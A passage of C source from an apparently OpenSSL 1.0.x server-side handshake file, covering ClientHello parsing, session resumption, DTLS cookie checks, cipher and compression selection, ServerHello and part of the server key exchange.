if ((ret=BIO_flush(s->wbio)) <= 0)
goto end;
}
if ((cb != NULL) && (s->state != state))
{
new_state=s->state;
s->state=state;
cb(s,SSL_CB_ACCEPT_LOOP,1);
s->state=new_state;
}
}
skip=0;
}
end:
/* BIO_flush(s->wbio); */
s->in_handshake--;
if (cb != NULL)
cb(s,SSL_CB_ACCEPT_EXIT,ret);
return(ret);
}
int ssl3_send_hello_request(SSL *s)
{
if (s->state == SSL3_ST_SW_HELLO_REQ_A)
{
ssl_set_handshake_header(s, SSL3_MT_HELLO_REQUEST, 0);
s->state=SSL3_ST_SW_HELLO_REQ_B;
}
/* SSL3_ST_SW_HELLO_REQ_B */
return ssl_do_write(s);
}
int ssl3_get_client_hello(SSL *s)
{
int i,j,ok,al=SSL_AD_INTERNAL_ERROR,ret= -1;
unsigned int cookie_len;
long n;
unsigned long id;
unsigned char *p,*d;
SSL_CIPHER *c;
#ifndef OPENSSL_NO_COMP
unsigned char *q;
SSL_COMP *comp=NULL;
#endif
STACK_OF(SSL_CIPHER) *ciphers=NULL;
if (s->state == SSL3_ST_SR_CLNT_HELLO_C && !s->first_packet)
goto retry_cert;
/* We do this so that we will respond with our native type.
* If we are TLSv1 and we get SSLv3, we will respond with TLSv1.
* This down-switching should be handled by a different method.
* If we are SSLv3, we will respond with SSLv3, even if prompted with
* TLSv1.
*/
if (s->state == SSL3_ST_SR_CLNT_HELLO_A
)
{
s->state=SSL3_ST_SR_CLNT_HELLO_B;
}
s->first_packet=1;
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CLNT_HELLO_B,
SSL3_ST_SR_CLNT_HELLO_C,
SSL3_MT_CLIENT_HELLO,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
s->first_packet=0;
d=p=(unsigned char *)s->init_msg;
/* use version from inside client hello, not from record header
* (may differ: see RFC 2246, Appendix E, second paragraph) */
s->client_version=(((int)p[0])<<8)|(int)p[1];
p+=2;
if (SSL_IS_DTLS(s) ? (s->client_version > s->version &&
s->method->version != DTLS_ANY_VERSION)
: (s->client_version < s->version))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
if ((s->client_version>>8) == SSL3_VERSION_MAJOR &&
!s->enc_write_ctx && !s->write_hash)
{
/* similar to ssl3_get_record, send alert using remote version number */
s->version = s->client_version;
}
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
/* If we require cookies and this ClientHello doesn't
* contain one, just return since we do not want to
* allocate any memory yet. So check cookie length...
*/
if (SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE)
{
unsigned int session_length, cookie_length;
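/* p still points at the client random here: the session-id length
* byte sits SSL3_RANDOM_SIZE bytes ahead, and the cookie length
* byte follows the session id itself */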
session_length = *(p + SSL3_RANDOM_SIZE);
cookie_length = *(p + SSL3_RANDOM_SIZE + session_length + 1);
if (cookie_length == 0)
return 1;
}
/* load the client random */
memcpy(s->s3->client_random,p,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/* get the session-id */
j= *(p++);
s->hit=0;
/* Versions before 0.9.7 always allow clients to resume sessions in renegotiation.
* 0.9.7 and later allow this by default, but optionally ignore resumption requests
* with flag SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION (it's a new flag rather
* than a change to default behavior so that applications relying on this for security
* won't even compile against older library versions).
*
* 1.0.1 and later also have a function SSL_renegotiate_abbreviated() to request
* renegotiation but not a new session (s->new_session remains unset): for servers,
* this essentially just means that the SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
* setting will be ignored.
*/
if ((s->new_session && (s->options & SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION)))
{
if (!ssl_get_new_session(s,1))
goto err;
}
else
{
i=ssl_get_prev_session(s, p, j, d + n);
/*
* Only resume if the session's version matches the negotiated
* version.
* RFC 5246 does not provide much useful advice on resumption
* with a different protocol version. It doesn't forbid it but
* the sanity of such behaviour would be questionable.
* In practice, clients do not accept a version mismatch and
* will abort the handshake with an error.
*/
if (i == 1 && s->version == s->session->ssl_version)
{ /* previous session */
s->hit=1;
}
else if (i == -1)
goto err;
else /* i == 0 */
{
if (!ssl_get_new_session(s,1))
goto err;
}
}
p+=j;
if (SSL_IS_DTLS(s))
{
/* cookie stuff */
cookie_len = *(p++);
/*
* The ClientHello may contain a cookie even if the
* HelloVerify message has not been sent--make sure that it
* does not cause an overflow.
*/
if ( cookie_len > sizeof(s->d1->rcvd_cookie))
{
/* too much data */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* verify the cookie if appropriate option is set. */
if ((SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE) &&
cookie_len > 0)
{
memcpy(s->d1->rcvd_cookie, p, cookie_len);
if ( s->ctx->app_verify_cookie_cb != NULL)
{
if ( s->ctx->app_verify_cookie_cb(s, s->d1->rcvd_cookie,
cookie_len) == 0)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* else cookie verification succeeded */
}
else if ( memcmp(s->d1->rcvd_cookie, s->d1->cookie,
s->d1->cookie_len) != 0) /* default verification */
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* Set to -2 so if successful we return 2 */
ret = -2;
}
p += cookie_len;
if (s->method->version == DTLS_ANY_VERSION)
{
/* Select version to use */
if (s->client_version <= DTLS1_2_VERSION &&
!(s->options & SSL_OP_NO_DTLSv1_2))
{
s->version = DTLS1_2_VERSION;
s->method = DTLSv1_2_server_method();
}
else if (tls1_suiteb(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
s->version = s->client_version;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
else if (s->client_version <= DTLS1_VERSION &&
!(s->options & SSL_OP_NO_DTLSv1))
{
s->version = DTLS1_VERSION;
s->method = DTLSv1_server_method();
}
else
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
s->version = s->client_version;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
s->session->ssl_version = s->version;
}
}
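/* read the two-byte length (in bytes) of the cipher suite list */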
n2s(p,i);
if ((i == 0) && (j != 0))
{
/* we need a cipher if we are not resuming a session */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_CIPHERS_SPECIFIED);
goto f_err;
}
if ((p+i) >= (d+n))
{
/* not enough data */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
if ((i > 0) && (ssl_bytes_to_cipher_list(s,p,i,&(ciphers))
== NULL))
{
goto err;
}
p+=i;
/* If it is a hit, check that the cipher is in the list */
if ((s->hit) && (i > 0))
{
j=0;
id=s->session->cipher->id;
#ifdef CIPHER_DEBUG
fprintf(stderr,"client sent %d ciphers\n",sk_SSL_CIPHER_num(ciphers));
#endif
for (i=0; i<sk_SSL_CIPHER_num(ciphers); i++)
{
c=sk_SSL_CIPHER_value(ciphers,i);
#ifdef CIPHER_DEBUG
fprintf(stderr,"client [%2d of %2d]:%s\n",
i,sk_SSL_CIPHER_num(ciphers),
SSL_CIPHER_get_name(c));
#endif
if (c->id == id)
{
j=1;
break;
}
}
/* Disabled because it can be used in a ciphersuite downgrade
* attack: CVE-2010-4180.
*/
#if 0
if (j == 0 && (s->options & SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG) && (sk_SSL_CIPHER_num(ciphers) == 1))
{
/* Special case as client bug workaround: the previously used cipher may
* not be in the current list, the client instead might be trying to
* continue using a cipher that before wasn't chosen due to server
* preferences. We'll have to reject the connection if the cipher is not
* enabled, though. */
c = sk_SSL_CIPHER_value(ciphers, 0);
if (sk_SSL_CIPHER_find(SSL_get_ciphers(s), c) >= 0)
{
s->session->cipher = c;
j = 1;
}
}
#endif
if (j == 0)
{
/* we need to have the cipher in the cipher
* list if we are asked to reuse it */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_REQUIRED_CIPHER_MISSING);
goto f_err;
}
}
/* compression */
i= *(p++);
if ((p+i) > (d+n))
{
/* not enough data */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
#ifndef OPENSSL_NO_COMP
q=p;
#endif
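/* the client must offer the NULL compression method (id 0);
* scan the list for it */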
for (j=0; j<i; j++)
{
if (p[j] == 0) break;
}
p+=i;
if (j >= i)
{
/* no compress */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_COMPRESSION_SPECIFIED);
goto f_err;
}
#ifndef OPENSSL_NO_TLSEXT
/* TLS extensions*/
if (s->version >= SSL3_VERSION)
{
if (!ssl_parse_clienthello_tlsext(s,&p,d,n))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_PARSE_TLSEXT);
goto err;
}
}
/* Check if we want to use an external pre-shared secret for this
* handshake (only for sessions that are not being reused). We need to
* generate server_random before calling tls_session_secret_cb in order
* to allow SessionTicket processing to use it in key derivation. */
{
unsigned char *pos;
pos=s->s3->server_random;
if (ssl_fill_hello_random(s, 1, pos, SSL3_RANDOM_SIZE) <= 0)
{
goto f_err;
}
}
if (!s->hit && s->version >= TLS1_VERSION && s->tls_session_secret_cb)
{
SSL_CIPHER *pref_cipher=NULL;
s->session->master_key_length=sizeof(s->session->master_key);
if(s->tls_session_secret_cb(s, s->session->master_key, &s->session->master_key_length,
ciphers, &pref_cipher, s->tls_session_secret_cb_arg))
{
s->hit=1;
s->session->ciphers=ciphers;
s->session->verify_result=X509_V_OK;
ciphers=NULL;
/* check if some cipher was preferred by call back */
pref_cipher=pref_cipher ? pref_cipher : ssl3_choose_cipher(s, s->session->ciphers, SSL_get_ciphers(s));
if (pref_cipher == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_SHARED_CIPHER);
goto f_err;
}
s->session->cipher=pref_cipher;
if (s->cipher_list)
sk_SSL_CIPHER_free(s->cipher_list);
if (s->cipher_list_by_id)
sk_SSL_CIPHER_free(s->cipher_list_by_id);
s->cipher_list = sk_SSL_CIPHER_dup(s->session->ciphers);
s->cipher_list_by_id = sk_SSL_CIPHER_dup(s->session->ciphers);
}
}
#endif
/* Worst case, we will use the NULL compression, but if we have other
* options, we will now look for them. We have i compression
* algorithms from the client, starting at q. */
s->s3->tmp.new_compression=NULL;
#ifndef OPENSSL_NO_COMP
/* This only happens if we have a cache hit */
if (s->session->compress_meth != 0)
{
int m, comp_id = s->session->compress_meth;
/* Perform sanity checks on resumed compression algorithm */
/* Can't disable compression */
if (!ssl_allow_compression(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
/* Look for resumed compression method */
for (m = 0; m < sk_SSL_COMP_num(s->ctx->comp_methods); m++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,m);
if (comp_id == comp->id)
{
s->s3->tmp.new_compression=comp;
break;
}
}
if (s->s3->tmp.new_compression == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INVALID_COMPRESSION_ALGORITHM);
goto f_err;
}
/* Look for resumed method in compression list */
for (m = 0; m < i; m++)
{
if (q[m] == comp_id)
break;
}
if (m >= i)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING);
goto f_err;
}
}
else if (s->hit)
comp = NULL;
else if (ssl_allow_compression(s) && s->ctx->comp_methods)
{ /* See if we have a match */
int m,nn,o,v,done=0;
nn=sk_SSL_COMP_num(s->ctx->comp_methods);
for (m=0; m<nn; m++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,m);
v=comp->id;
for (o=0; o<i; o++)
{
if (v == q[o])
{
done=1;
break;
}
}
if (done) break;
}
if (done)
s->s3->tmp.new_compression=comp;
else
comp=NULL;
}
#else
/* If compression is disabled we'd better not try to resume a session
* using compression.
*/
if (s->session->compress_meth != 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
#endif
/* Given s->session->ciphers and SSL_get_ciphers, we must
* pick a cipher */
if (!s->hit)
{
#ifdef OPENSSL_NO_COMP
s->session->compress_meth=0;
#else
s->session->compress_meth=(comp == NULL)?0:comp->id;
#endif
if (s->session->ciphers != NULL)
sk_SSL_CIPHER_free(s->session->ciphers);
s->session->ciphers=ciphers;
if (ciphers == NULL)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_CIPHERS_PASSED);
goto f_err;
}
ciphers=NULL;
if (!tls1_set_server_sigalgs(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
/* Let cert callback update server certificates if required */
retry_cert:
if (s->cert->cert_cb)
{
int rv = s->cert->cert_cb(s, s->cert->cert_cb_arg);
if (rv == 0)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_CERT_CB_ERROR);
goto f_err;
}
if (rv < 0)
{
s->rwstate=SSL_X509_LOOKUP;
return -1;
}
s->rwstate = SSL_NOTHING;
}
c=ssl3_choose_cipher(s,s->session->ciphers,
SSL_get_ciphers(s));
if (c == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_SHARED_CIPHER);
goto f_err;
}
s->s3->tmp.new_cipher=c;
/* check whether we should disable session resumption */
if (s->not_resumable_session_cb != NULL)
s->session->not_resumable=s->not_resumable_session_cb(s,
((c->algorithm_mkey & (SSL_kDHE | SSL_kECDHE)) != 0));
if (s->session->not_resumable)
/* do not send a session ticket */
s->tlsext_ticket_expected = 0;
}
else
{
/* Session-id reuse */
#ifdef REUSE_CIPHER_BUG
STACK_OF(SSL_CIPHER) *sk;
SSL_CIPHER *nc=NULL;
SSL_CIPHER *ec=NULL;
if (s->options & SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG)
{
sk=s->session->ciphers;
for (i=0; i<sk_SSL_CIPHER_num(sk); i++)
{
c=sk_SSL_CIPHER_value(sk,i);
if (c->algorithm_enc & SSL_eNULL)
nc=c;
if (SSL_C_IS_EXPORT(c))
ec=c;
}
if (nc != NULL)
s->s3->tmp.new_cipher=nc;
else if (ec != NULL)
s->s3->tmp.new_cipher=ec;
else
s->s3->tmp.new_cipher=s->session->cipher;
}
else
#endif
s->s3->tmp.new_cipher=s->session->cipher;
}
if (!SSL_USE_SIGALGS(s) || !(s->verify_mode & SSL_VERIFY_PEER))
{
if (!ssl3_digest_cached_records(s))
goto f_err;
}
/*-
* we now have the following setup.
* client_random
* cipher_list - our preferred list of ciphers
* ciphers - the client's preferred list of ciphers
* compression - basically ignored right now
* ssl version is set - sslv3
* s->session - The ssl session has been set up.
* s->hit - session reuse flag
* s->s3->tmp.new_cipher- the new cipher to use.
*/
/* Handles TLS extensions that we couldn't check earlier */
if (s->version >= SSL3_VERSION)
{
if (ssl_check_clienthello_tlsext_late(s) <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
}
if (ret < 0) ret=-ret;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
if (ciphers != NULL) sk_SSL_CIPHER_free(ciphers);
return ret < 0 ? -1 : ret;
}
int ssl3_send_server_hello(SSL *s)
{
unsigned char *buf;
unsigned char *p,*d;
int i,sl;
int al = 0;
unsigned long l;
if (s->state == SSL3_ST_SW_SRVR_HELLO_A)
{
buf=(unsigned char *)s->init_buf->data;
#ifdef OPENSSL_NO_TLSEXT
p=s->s3->server_random;
if (ssl_fill_hello_random(s, 1, p, SSL3_RANDOM_SIZE) <= 0)
return -1;
#endif
/* Do the message type and length last */
d=p= ssl_handshake_start(s);
*(p++)=s->version>>8;
*(p++)=s->version&0xff;
/* Random stuff */
memcpy(p,s->s3->server_random,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/*-
* There are several cases for the session ID to send
* back in the server hello:
* - For session reuse from the session cache,
* we send back the old session ID.
* - If stateless session reuse (using a session ticket)
* is successful, we send back the client's "session ID"
* (which doesn't actually identify the session).
* - If it is a new session, we send back the new
* session ID.
* - However, if we want the new session to be single-use,
* we send back a 0-length session ID.
* s->hit is non-zero in either case of session reuse,
* so the following won't overwrite an ID that we're supposed
* to send back.
*/
if (s->session->not_resumable ||
(!(s->ctx->session_cache_mode & SSL_SESS_CACHE_SERVER)
&& !s->hit))
s->session->session_id_length=0;
sl=s->session->session_id_length;
if (sl > (int)sizeof(s->session->session_id))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO, ERR_R_INTERNAL_ERROR);
return -1;
}
*(p++)=sl;
memcpy(p,s->session->session_id,sl);
p+=sl;
/* put the cipher */
i=ssl3_put_cipher_by_char(s->s3->tmp.new_cipher,p);
p+=i;
/* put the compression method */
#ifdef OPENSSL_NO_COMP
*(p++)=0;
#else
if (s->s3->tmp.new_compression == NULL)
*(p++)=0;
else
*(p++)=s->s3->tmp.new_compression->id;
#endif
#ifndef OPENSSL_NO_TLSEXT
if (ssl_prepare_serverhello_tlsext(s) <= 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO,SSL_R_SERVERHELLO_TLSEXT);
return -1;
}
if ((p = ssl_add_serverhello_tlsext(s, p, buf+SSL3_RT_MAX_PLAIN_LENGTH, &al)) == NULL)
{
ssl3_send_alert(s, SSL3_AL_FATAL, al);
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO,ERR_R_INTERNAL_ERROR);
return -1;
}
#endif
/* do the header */
l=(p-d);
ssl_set_handshake_header(s, SSL3_MT_SERVER_HELLO, l);
s->state=SSL3_ST_SW_SRVR_HELLO_B;
}
/* SSL3_ST_SW_SRVR_HELLO_B */
return ssl_do_write(s);
}
int ssl3_send_server_done(SSL *s)
{
if (s->state == SSL3_ST_SW_SRVR_DONE_A)
{
ssl_set_handshake_header(s, SSL3_MT_SERVER_DONE, 0);
s->state = SSL3_ST_SW_SRVR_DONE_B;
}
/* SSL3_ST_SW_SRVR_DONE_B */
return ssl_do_write(s);
}
int ssl3_send_server_key_exchange(SSL *s)
{
#ifndef OPENSSL_NO_RSA
unsigned char *q;
int j,num;
RSA *rsa;
unsigned char md_buf[MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH];
unsigned int u;
#endif
#ifndef OPENSSL_NO_DH
DH *dh=NULL,*dhp;
#endif
#ifndef OPENSSL_NO_ECDH
EC_KEY *ecdh=NULL, *ecdhp;
unsigned char *encodedPoint = NULL;
int encodedlen = 0;
int curve_id = 0;
BN_CTX *bn_ctx = NULL;
#endif
EVP_PKEY *pkey;
const EVP_MD *md = NULL;
unsigned char *p,*d;
int al,i;
unsigned long type;
int n;
CERT *cert;
BIGNUM *r[4];
int nr[4],kn;
BUF_MEM *buf;
EVP_MD_CTX md_ctx;
EVP_MD_CTX_init(&md_ctx);
if (s->state == SSL3_ST_SW_KEY_EXCH_A)
{
type=s->s3->tmp.new_cipher->algorithm_mkey;
cert=s->cert;
buf=s->init_buf;
r[0]=r[1]=r[2]=r[3]=NULL;
n=0;
#ifndef OPENSSL_NO_RSA
if (type & SSL_kRSA)
{
rsa=cert->rsa_tmp;
if ((rsa == NULL) && (s->cert->rsa_tmp_cb != NULL))
{
rsa=s->cert->rsa_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
if(rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_ERROR_GENERATING_TMP_RSA_KEY);
goto f_err;
}
RSA_up_ref(rsa);
cert->rsa_tmp=rsa;
}
if (rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_RSA_KEY);
goto f_err;
}
r[0]=rsa->n;
r[1]=rsa->e;
s->s3->tmp.use_rsa_tmp=1;
}
else
#endif
#ifndef OPENSSL_NO_DH
if (type & SSL_kDHE)
{
if (s->cert->dh_tmp_auto)
{
dhp = ssl_get_auto_dh(s);
if (dhp == NULL)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto f_err;
}
}
else
dhp=cert->dh_tmp;
if ((dhp == NULL) && (s->cert->dh_tmp_cb != NULL))
dhp=s->cert->dh_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
if (dhp == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
if (!ssl_security(s, SSL_SECOP_TMP_DH,
DH_security_bits(dhp), 0, dhp))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_DH_KEY_TOO_SMALL);
goto f_err;
}
if (s->s3->tmp.dh != NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
if (s->cert->dh_tmp_auto)
dh = dhp;
else if ((dh=DHparams_dup(dhp)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
s->s3->tmp.dh=dh;
if ((dhp->pub_key == NULL ||
dhp->priv_key == NULL ||
(s->options & SSL_OP_SINGLE_DH_USE)))
{
if(!DH_generate_key(dh))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
ERR_R_DH_LIB);
goto err;
}
}
else
{
dh->pub_key=BN_dup(dhp->pub_key);
dh->priv_key=BN_dup(dhp->priv_key);
if ((dh->pub_key == NULL) ||
(dh->priv_key == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
}
r[0]=dh->p;
r[1]=dh->g;
r[2]=dh->pub_key;
}
else
#endif
#ifndef OPENSSL_NO_ECDH
if (type & SSL_kECDHE)
{
const EC_GROUP *group;
ecdhp=cert->ecdh_tmp;
if (s->cert->ecdh_tmp_auto)
{
/* Get NID of appropriate shared curve */
int nid = tls1_shared_curve(s, -2);
if (nid != NID_undef)
ecdhp = EC_KEY_new_by_curve_name(nid);
}
else if ((ecdhp == NULL) && s->cert->ecdh_tmp_cb)
{
ecdhp=s->cert->ecdh_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
}
if (ecdhp == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_ECDH_KEY);
goto f_err;
}
if (s->s3->tmp.ecdh != NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
/* Duplicate the ECDH structure. */
if (ecdhp == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
if (s->cert->ecdh_tmp_auto)
ecdh = ecdhp;
else if ((ecdh = EC_KEY_dup(ecdhp)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
s->s3->tmp.ecdh=ecdh;
if ((EC_KEY_get0_public_key(ecdh) == NULL) ||
(EC_KEY_get0_private_key(ecdh) == NULL) ||
(s->options & SSL_OP_SINGLE_ECDH_USE))
{
if(!EC_KEY_generate_key(ecdh))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
}
if (((group = EC_KEY_get0_group(ecdh)) == NULL) ||
(EC_KEY_get0_public_key(ecdh) == NULL) ||
(EC_KEY_get0_private_key(ecdh) == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
(EC_GROUP_get_degree(group) > 163))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
goto err;
}
/* XXX: For now, we only support ephemeral ECDH
* keys over named (not generic) curves. For
* supported named curves, curve_id is non-zero.
*/
if ((curve_id =
tls1_ec_nid2curve_id(EC_GROUP_get_curve_name(group)))
== 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNSUPPORTED_ELLIPTIC_CURVE);
goto err;
}
/* Encode the public key.
* First check the size of encoding and
* allocate memory accordingly.
*/
encodedlen = EC_POINT_point2oct(group,
EC_KEY_get0_public_key(ecdh),
POINT_CONVERSION_UNCOMPRESSED,
NULL, 0, NULL);
encodedPoint = (unsigned char *)
OPENSSL_malloc(encodedlen*sizeof(unsigned char));
bn_ctx = BN_CTX_new();
if ((encodedPoint == NULL) || (bn_ctx == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
encodedlen = EC_POINT_point2oct(group,
EC_KEY_get0_public_key(ecdh),
POINT_CONVERSION_UNCOMPRESSED,
encodedPoint, encodedlen, bn_ctx);
if (encodedlen == 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
BN_CTX_free(bn_ctx); bn_ctx=NULL;
/* XXX: For now, we only support named (not
* generic) curves in ECDH ephemeral key exchanges.
* In this situation, we need four additional bytes
* to encode the entire ServerECDHParams
* structure.
*/
n = 4 + encodedlen;
/* We'll generate the serverKeyExchange message
* explicitly so we can set these to NULLs
*/
r[0]=NULL;
r[1]=NULL;
r[2]=NULL;
r[3]=NULL;
}
else
#endif /* !OPENSSL_NO_ECDH */
#ifndef OPENSSL_NO_PSK
if (type & SSL_kPSK)
{
/* reserve size for record length and PSK identity hint */
n+=2+strlen(s->ctx->psk_identity_hint);
}
else
#endif /* !OPENSSL_NO_PSK */
#ifndef OPENSSL_NO_SRP
if (type & SSL_kSRP)
{
if ((s->srp_ctx.N == NULL) ||
(s->srp_ctx.g == NULL) ||
(s->srp_ctx.s == NULL) ||
(s->srp_ctx.B == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_SRP_PARAM);
goto err;
}
r[0]=s->srp_ctx.N;
r[1]=s->srp_ctx.g;
r[2]=s->srp_ctx.s;
r[3]=s->srp_ctx.B;
}
else
#endif
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE);
goto f_err;
}
for (i=0; i < 4 && r[i] != NULL; i++)
{
nr[i]=BN_num_bytes(r[i]);
#ifndef OPENSSL_NO_SRP
if ((i == 2) && (type & SSL_kSRP))
n+=1+nr[i];
else
#endif
n+=2+nr[i];
}
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
if ((pkey=ssl_get_sign_pkey(s,s->s3->tmp.new_cipher,&md))
== NULL)
{
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
kn=EVP_PKEY_size(pkey);
}
else
{
pkey=NULL;
kn=0;
}
if (!BUF_MEM_grow_clean(buf,n+SSL_HM_HEADER_LENGTH(s)+kn))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_BUF);
goto err;
}
d = p = ssl_handshake_start(s);
for (i=0; i < 4 && r[i] != NULL; i++)
{
#ifndef OPENSSL_NO_SRP
if ((i == 2) && (type & SSL_kSRP))
{
*p = nr[i];
p++;
}
else
#endif
s2n(nr[i],p);
BN_bn2bin(r[i],p);
p+=nr[i];
}
#ifndef OPENSSL_NO_ECDH
if (type & SSL_kECDHE)
{
/* XXX: For now, we only support named (not generic) curves.
* In this situation, the serverKeyExchange message has:
* [1 byte CurveType], [2 byte CurveName]
* [1 byte length of encoded point], followed by
